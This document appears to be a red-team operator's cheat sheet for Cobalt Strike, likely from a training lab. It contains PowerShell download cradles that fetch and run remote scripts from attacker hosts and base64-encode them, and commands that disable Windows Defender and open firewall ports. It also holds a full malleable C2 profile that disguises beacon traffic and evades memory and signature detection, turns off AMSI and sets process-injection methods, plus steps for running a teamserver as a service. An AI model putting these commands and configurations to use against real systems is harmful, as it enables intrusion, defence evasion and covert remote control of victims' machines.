# Run a python3 webserver
$ python3 -m http.server
# Check outbound access to TeamServer
$ iwr -Uri <http://nickelviper.com/a>
$ iwr -Uri <http://nickelviper.com/a> -OutFile beacon.ps1
# Change incoming firewall rules
beacon> powerpick Get-NetFirewallRule
# Allow HTTP inbound and outbound connections
beacon> powerpick New-NetFirewallRule -Name "HTTP-Inbound" -DisplayName "HTTP (TCP-In)" -Enabled True -Direction Inbound -Protocol TCP -Action Allow -LocalPort 80
beacon> powerpick New-NetFirewallRule -Name "HTTP-Outbound" -DisplayName "HTTP (TCP-Out)" -Enabled True -Direction Outbound -Protocol TCP -Action Allow -LocalPort 80
# Allow inbound and outbound connections on a specific port
# Inbound Rule
beacon> powerpick New-NetFirewallRule -Name "Allow-Port-Inbound" -DisplayName "Allow Inbound Connections to Port 12345" -Enabled True -Direction Inbound -Protocol TCP -Action Allow -LocalPort 4444
# Outbound Rule
beacon> powerpick New-NetFirewallRule -Name "Allow-Port-Outbound" -DisplayName "Allow Outbound Connections to Port 12345" -Enabled True -Direction Outbound -Protocol TCP -Action Allow -RemotePort 4444
# Removing a firewall rule by its name
beacon> powerpick Remove-NetFirewallRule -DisplayName "Test Rule"
# Disable Real-Time Protection / Windows Defender
beacon> powerpick Set-MPPreference -DisableRealTimeMonitoring $true -Verbose
beacon> powerpick Set-MPPreference -DisableIOAVProtection $true -Verbose
beacon> powerpick Set-MPPreference -DisableIntrusionPreventionSystem $true -Verbose
## Encode the PowerShell payload as base64 to avoid problems with nested quotes
# From Powershell
PS C:\\> $str = 'IEX ((new-object net.webclient).downloadstring("<http://nickelviper.com/a>"))'
PS C:\\> [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))
# From Linux
$ echo -n "IEX(New-Object Net.WebClient).downloadString('<http://10.10.14.31/shell.ps1>')" | iconv -t UTF-16LE | base64 -w 0
# Final Command to execute encoded payload
powershell -nop -enc <BASE64_ENCODED_PAYLOAD>
# CobaltStrike AggressorScripts for Persistence
<https://github.com/Peco602/cobaltstrike-aggressor-scripts/tree/main/persistence-sharpersist>
./c2lint c2-profiles/custom/custom.profile
# make our C2 look like a Google Web Bug
# <https://developers.google.com/analytics/resources/articles/gaTrackingTroubleshooting>
#
# Author: @armitagehacker
set sleeptime "30000"; # 45 Seconds
set jitter "37"; # % jitter
set data_jitter "100";
https-certificate {
set keystore "localhost.store";
set password "pass123";
}
http-get {
set uri "/__utm.gif";
client {
parameter "utmac" "UA-2202604-2";
parameter "utmcn" "1";
parameter "utmcs" "ISO-8859-1";
parameter "utmsr" "1280x1024";
parameter "utmsc" "32-bit";
parameter "utmul" "en-US";
metadata {
netbios;
prepend "SESSIONID=";
header "Cookie";
# prepend "__utma";
# parameter "utmcc";
}
# Metadata/beacon data will be appended to the Cookie header as the SESSIONID value; a redirector can then use cookie rules to filter traffic based on whether that cookie is present.
#metadata {
# netbios;
# prepend "SESSIONID=";
# header "Cookie";
#}
}
server {
header "Content-Type" "image/gif";
output {
# hexdump pixel.gif
# 0000000 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00
# 0000010 ff ff ff 21 f9 04 01 00 00 00 00 2c 00 00 00 00
# 0000020 01 00 01 00 00 02 01 44 00 3b
prepend "\\x01\\x00\\x01\\x00\\x00\\x02\\x01\\x44\\x00\\x3b";
prepend "\\xff\\xff\\xff\\x21\\xf9\\x04\\x01\\x00\\x00\\x00\\x2c\\x00\\x00\\x00\\x00";
prepend "\\x47\\x49\\x46\\x38\\x39\\x61\\x01\\x00\\x01\\x00\\x80\\x00\\x00\\x00\\x00";
print;
}
}
}
http-post {
set uri "/___utm.gif";
client {
header "Content-Type" "application/octet-stream";
id {
prepend "UA-220";
append "-2";
parameter "utmac";
}
parameter "utmcn" "1";
parameter "utmcs" "ISO-8859-1";
parameter "utmsr" "1280x1024";
parameter "utmsc" "32-bit";
parameter "utmul" "en-US";
output {
print;
}
}
server {
header "Content-Type" "image/gif";
output {
prepend "\\x01\\x00\\x01\\x00\\x00\\x02\\x01\\x44\\x00\\x3b";
prepend "\\xff\\xff\\xff\\x21\\xf9\\x04\\x01\\x00\\x00\\x00\\x2c\\x00\\x00\\x00\\x00";
prepend "\\x47\\x49\\x46\\x38\\x39\\x61\\x01\\x00\\x01\\x00\\x80\\x00\\x00\\x00\\x00";
print;
}
}
}
# Enable or disable staged payloads
set host_stage "false";
#http-stager {
# server {
# header "Content-Type" "image/gif";
# }
#}
stage {
# Reference : <https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/malleable-c2-extend_pe-memory-indicators.htm?Highlight=set%20obfuscate>
# CS 4.2 added allocator and MZ header overrides
set allocator "MapViewOfFile"; # Options are: HeapAlloc, MapViewOfFile, and VirtualAlloc
set magic_mz_x86 "SVAC";
set magic_mz_x64 "CVAS";
set magic_pe "NO";
set userwx "false";
set stomppe "true";
set cleanup "true";
set obfuscate "false";
# CS 3.12 Addition "Obfuscate and Sleep"
set sleep_mask "true";
# CS 4.1
set smartinject "true";
# Make the Beacon Reflective DLL look like something else in memory
# Values captured using peclone against a Windows 10 version of explorer.exe
set checksum "0";
set compile_time "11 Nov 2016 04:08:32";
set entry_point "650688";
set image_size_x86 "4661248";
set image_size_x64 "4661248";
set name "srv.dll";
set rich_header "\\x3e\\x98\\xfe\\x75\\x7a\\xf9\\x90\\x26\\x7a\\xf9\\x90\\x26\\x7a\\xf9\\x90\\x26\\x73\\x81\\x03\\x26\\xfc\\xf9\\x90\\x26\\x17\\xa4\\x93\\x27\\x79\\xf9\\x90\\x26\\x7a\\xf9\\x91\\x26\\x83\\xfd\\x90\\x26\\x17\\xa4\\x91\\x27\\x65\\xf9\\x90\\x26\\x17\\xa4\\x95\\x27\\x77\\xf9\\x90\\x26\\x17\\xa4\\x94\\x27\\x6c\\xf9\\x90\\x26\\x17\\xa4\\x9e\\x27\\x56\\xf8\\x90\\x26\\x17\\xa4\\x6f\\x26\\x7b\\xf9\\x90\\x26\\x17\\xa4\\x92\\x27\\x7b\\xf9\\x90\\x26\\x52\\x69\\x63\\x68\\x7a\\xf9\\x90\\x26\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00";
## WARNING: Module stomping
# Cobalt Strike 3.11 also adds module stomping to Beacon's Reflective Loader. When enabled, Beacon's loader will shun VirtualAlloc and instead load a DLL into the current process and overwrite its memory.
# Set module_x86 to a favorite x86 DLL to module stomp with the x86 Beacon. The module_x64 option enables this for the x64 Beacon.
# While this is a powerful feature, caveats apply! If the library you load is not large enough to host Beacon, you will crash Beacon's process. If the current process loads the same library later (for whatever reason), you will crash Beacon's process. Choose carefully.
# By default, Beacon's loader allocates memory with VirtualAlloc. Module stomping is an alternative to this. Set module_x86 to a DLL that is about twice as large as the Beacon payload itself. Beacon's x86 loader will load the specified DLL, find its location in memory, and overwrite it. This is a way to situate Beacon in memory that Windows associates with a file on disk. It's important that the DLL you choose is not needed by the applications you intend to reside in. The module_x64 option is the same story, but it affects the x64 Beacon.
# Details can be found in the In-memory Evasion video series. <https://youtu.be/uWVH9l2GMw4>
# set module_x64 "netshell.dll";
# set module_x86 "netshell.dll";
# CS 4.8 - Added default syscall method option. This option supports: None, Direct, and Indirect.
set syscall_method "None";
# The transform-x86 and transform-x64 blocks pad and transform Beacon's Reflective DLL stage. These blocks support three commands: prepend, append, and strrep.
transform-x86 { # transform the x86 rDLL stage
prepend "\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90"; # prepend nops
strrep "ReflectiveLoader" "execute"; # Change this text
strrep "This program cannot be run in DOS mode" ""; # Remove this text
strrep "beacon.dll" ""; # Remove this text
# Taken from <https://0xmaz.me/posts/Cobalt-Strike-C2-Memory-Evasion-Part1/#transform-blocks-explanation>
strrep "%s as %s\\\\%s: %d" "%s - %s\\\\%s: %d";
strrep "%02d/%02d/%02d %02d:%02d:%02d" "%02d-%02d-%02d %02d:%02d:%02d";
}
# Check <https://whiteknightlabs.com/2023/05/23/unleashing-the-unseen-harnessing-the-power-of-cobalt-strike-profiles-for-edr-evasion/>
transform-x64 { # transform the x64 rDLL stage
strrep "(admin)" "(adm)";
# Taken from <https://0xmaz.me/posts/Cobalt-Strike-C2-Memory-Evasion-Part1/#transform-blocks-explanation>
strrep "%s as %s\\\\%s: %d" "%s - %s\\\\%s: %d";
strrep "%02d/%02d/%02d %02d:%02d:%02d" "%02d-%02d-%02d %02d:%02d:%02d";
#strrep "%s as %s\\\\%s: %d" "%s - %s\\\\%s: %d";
strrep "%s as %s\\\\%s: %d" "%s -- %s\\\\%s: %d";
strrep "%02d/%02d/%02d %02d:%02d:%02d" "%02d/%02d/%02d,%02d:%02d:%02d";
strrep "\\x48\\x89\\x5C\\x24\\x08\\x57\\x48\\x83\\xEC\\x20\\x48\\x8B\\x59\\x10\\x48\\x8B\\xF9\\x48\\x8B\\x49\\x08\\xFF\\x17\\x33\\xD2\\x41\\xB8\\x00\\x80\\x00\\x00" "\\x31\\xC0\\x89\\x5C\\x24\\x08\\x57\\x83\\xEC\\x20\\x48\\x8B\\x59\\x10\\x48\\x8B\\xF9\\x48\\x8B\\x49\\x08\\xFF\\x17\\x33\\xD2\\x41\\xB8\\x00\\x80\\x00\\x00";
strrep "\\x25\\xFF\\xFF\\xFF\\x00\\x3D\\x41\\x41\\x41\\x00" "\\xB8\\x41\\x41\\x41\\x00\\x3D\\x41\\x41\\x41\\x00";
#strrep "\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41" "\\x44\\x44\\x44\\x44\\x44\\x44\\x44\\x44";
#strrep "\\x41\\x41\\x41" "\\x44\\x44\\x44";
#strrep "\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42" "\\x43\\x43\\x43\\x43\\x43\\x43\\x43\\x43";
#strrep "\\x42\\x42\\x42" "\\x43\\x43\\x43";
strrep "This program cannot be run in DOS mode" ""; # Remove this text
strrep "ReflectiveLoader" "";
strrep "beacon.x64.dll" "";
strrep "beacon.dll" ""; # Remove this text
strrep "msvcrt.dll" "";
strrep "C:\\\\Windows\\\\System32\\\\msvcrt.dll" "";
strrep "Stack around the variable" "";
strrep "was corrupted." "";
strrep "The variable" "";
strrep "is being used without being initialized." "";
strrep "The value of ESP was not properly saved across a function call. This is usually a result of calling a function declared with one calling convention with a function pointer declared" "";
strrep "A cast to a smaller data type has caused a loss of data. If this was intentional, you should mask the source of the cast with the appropriate bitmask. For example:" "";
strrep "Changing the code in this way will not affect the quality of the resulting optimized code." "";
strrep "Stack memory was corrupted" "";
strrep "A local variable was used before it was initialized" "";
strrep "Stack memory around _alloca was corrupted" "";
strrep "Unknown Runtime Check Error" "";
strrep "Unknown Filename" "";
strrep "Unknown Module Name" "";
strrep "Run-Time Check Failure" "";
strrep "Stack corrupted near unknown variable" "";
strrep "Stack pointer corruption" "";
strrep "Cast to smaller type causing loss of data" "";
strrep "Stack memory corruption" "";
strrep "Local variable used before initialization" "";
strrep "Stack around" "corrupted";
strrep "operator" "";
strrep "operator co_await" "";
strrep "operator<=>" "";
}
stringw "jQuery"; # Add this string to the DLL
}
post-ex {
# Optionally specify a non-existent file path to force manual specification based on the Beacon host's running processes
set spawnto_x86 "%windir%\\\\syswow64\\\\werfault.exe";
# set spawnto_x86 "c:\\\\windows\\\\syswow64\\\\cmd.exe";
# Hardcode paths like C:\\\\Windows\\\\System32\\\\dllhost.exe to avoid potential detections for %SYSNATIVE% use. !! This will break when attempting to spawn a 64bit post-ex job from a 32bit Beacon.
# set spawnto_x64 "%windir%\\\\System32\\\\werfault.exe";
set spawnto_x64 "C:\\\\program files (x86)\\\\microsoft\\\\edge\\\\application\\\\msedge.exe";
# change the permissions and content of our post-ex DLLs
set obfuscate "true";
# pass key function pointers from Beacon to its child jobs
set smartinject "true";
# disable AMSI in powerpick, execute-assembly, and psinject
set amsi_disable "true";
# Modify our post-ex pipe names
# set pipename "Winsock2\\\\CatalogChangeListener-###-0,";
set pipename "TSVCPIPE-########-####-####-1337-############";
# set keylogger "GetAsyncKeyState";
#set threadhint "module!function+0x##"
}
process-inject {
# set a remote memory allocation technique: VirtualAllocEx|NtMapViewOfSection
set allocator "NtMapViewOfSection";
# CS 4.7 added memory allocation methods for BOF content in the current process
set bof_allocator "HeapAlloc"; # Options are: HeapAlloc, MapViewOfFile, and VirtualAlloc
set bof_reuse_memory "false"; # tells Beacon to free BOF memory after execution.
# Minimum memory allocation size when injecting content
set min_alloc "17500";
# Set memory permissions: initial=RWX, final=RX
set startrwx "false"; # Tells beacon to allocate BOF memory as RW
set userwx "false"; # Tells Beacon to set the memory to RX before execution.
# Transform injected content to avoid signature detection of first few bytes. Only supports prepend and append.
transform-x86 {
prepend "\\x90\\x90";
#append "\\x90\\x90";
}
transform-x64 {
prepend "\\x90\\x90";
#append "\\x90\\x90";
}
## The execute block controls the methods Beacon will use when it needs to inject code into a process. Beacon examines each option in the execute block, determines if the option is usable for the current context, tries the method when it is usable, and moves on to the next option if code execution did not happen. The execute options include:
#
# Name x86->x64 x64-x86 Notes
#########################################################################
# CreateThread Current Process only
# CreateRemoteThread Yes No cross-session
# NtQueueApcThread
# NtQueueApcThread-s This is the "Early Bird" injection technique. Suspended processes (e.g., post-ex jobs) only.
# RtlCreateUserThread Yes Yes Risky on XP-era targets; uses RWX shellcode for x86->x64 injection.
# SetThreadContext Yes Suspended processes (e.g. post-ex jobs only)
execute {
# The order is important! Each step will be attempted (if applicable) until successful
## self-injection
CreateThread "ntdll!RtlUserThreadStart+0x42";
CreateThread;
## Injection via suspended processes (SetThreadContext|NtQueueApcThread-s)
# OPSEC - when you use SetThreadContext; your thread will have a start address that reflects the original execution entry point of the temporary process.
# SetThreadContext;
NtQueueApcThread-s;
## Injection into existing processes
# OPSEC Uses RWX stub - Detected by Get-InjectedThread. Less detected by some defensive products.
#NtQueueApcThread;
# CreateRemoteThread - Vanilla cross-process injection technique. Does not cross session boundaries
# OPSEC - fires Sysmon Event 8
CreateRemoteThread;
# RtlCreateUserThread - Supports all architecture dependent corner cases (e.g., 32bit -> 64bit injection) AND injection across session boundaries
# OPSEC - fires Sysmon Event 8. Uses Meterpreter implementation and RWX stub - Detected by Get-InjectedThread
RtlCreateUserThread;
}
}
Configure Beacon Certificates
# 1. Generate certificate keypair using openssl
attacker@teamserver ~/cobaltstrike> openssl req -x509 -nodes -newkey rsa:2048 -keyout localhost.key -out localhost.crt -sha256 -days 365 -subj '/CN=localhost'
# 2. Because the team server is written in Java, these need to be imported into a Java KeyStore format. First, combine the separate public and private files into a single PFX file.
attacker@teamserver ~/cobaltstrike> openssl pkcs12 -inkey localhost.key -in localhost.crt -export -out localhost.pfx
Enter Export Password: pass123
Verifying - Enter Export Password: pass123
# 3. The PFX file can then be converted to a Java KeyStore using the keytool utility. The password of this new store can be the same or different to the one you used to export the PKCS12.
attacker@teamserver ~/cobaltstrike> keytool -importkeystore -srckeystore localhost.pfx -srcstoretype pkcs12 -destkeystore localhost.store
# 4. This will produce a new file, localhost.store, which needs to be copied to the team server.
attacker@teamserver ~/cobaltstrike> rm localhost.pfx
# 5. Add certificate to your malleable c2 profile
https-certificate {
set keystore "localhost.store";
set password "pass123";
}
# 6. Launch the team server with the updated profile.
attacker@teamserver ~/cobaltstrike> sudo ./teamserver 10.10.5.50 Passw0rd! c2-profiles/custom-crtl.profile
# 7. Then start a new HTTPS listener using the domain name, and verify the certificate on the listener by hitting it with curl.
attacker@DESKTOP-3BSK7NO ~> curl -v -k <https://10.10.5.50>
Start the team server and run it as a service
> sudo ./teamserver 10.10.5.50 Passw0rd! c2-profiles/custom-crtl.profile
Run Teamserver as a Service
$ ip a
$ sudo nano /etc/systemd/system/teamserver.service
[Unit]
Description=Cobalt Strike Team Server
After=network.target
StartLimitIntervalSec=0
[Service]
Type=simple
Restart=always
RestartSec=1
User=root
WorkingDirectory=/home/attacker/cobaltstrike
ExecStart=/home/attacker/cobaltstrike/teamserver 10.10.5.50 Passw0rd! c2-profiles/custom-crtl.profile
[Install]
WantedBy=multi-user.target
$ sudo systemctl daemon-reload
$ sudo systemctl status teamserver.service
$ sudo systemctl start teamserver.service
$ sudo systemctl enable teamserver.service